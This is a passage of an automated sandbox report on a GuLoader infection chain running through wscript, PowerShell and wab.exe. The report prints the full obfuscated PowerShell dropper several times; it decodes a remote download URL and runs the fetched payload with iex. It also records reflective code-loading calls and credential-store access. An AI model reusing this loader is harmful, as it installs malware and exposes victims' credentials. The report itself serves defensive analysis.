            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: Binary string: Management.Automation.pdb source: powershell.exe, 00000007.00000002.2057508825.00000000071DC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000007.00000002.2050424001.0000000002D40000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2057508825.00000000071B6000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("POWERSHELL.exe", ""$Semiannually163 = 1;$Varityped='Subst", "", "", "0");
            Yara detected GuLoader
            Source: Yara matchFile source: 0000000B.00000002.2765371278.0000000005800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2067203805.000000000A2B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2066487605.0000000008580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2054965837.0000000005C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2255196351.00000250CBDD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Nummerpladens)$global:Spaciously = [System.Text.Encoding]::ASCII.GetString($Spattled)$global:Epispastic=$Spaciously.substring(292846,28358)<#Seriously Beginger Zygodactyl Blgepap For
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Avisls $Arduousness $Memorandist), (Emulgatorernes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hedensk = [AppDomain]::CurrentDomain.GetAssemblies()$glo
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Cirkulrebrevets)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Forreven, $false).DefineType($Counterpara
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Nummerpladens)$global:Spaciously = [System.Text.Encoding]::ASCII.GetString($Spattled)$global:Epispastic=$Spaciously.substring(292846,28358)<#Seriously Beginger Zygodactyl Blgepap For
            Suspicious powershell command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.Beli
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.Beli
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.BeliJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.BeliJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFB4B247866 push ebx; retf 3_2_00007FFB4B24796A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFB4B2400BD pushad ; iretd 3_2_00007FFB4B2400C1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_02E059C8 pushad ; iretd 7_2_02E059DE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_074308C2 push eax; mov dword ptr [esp], ecx7_2_07430AC4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_02DF0CB5 push edi; ret 11_2_02DF0CC2
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
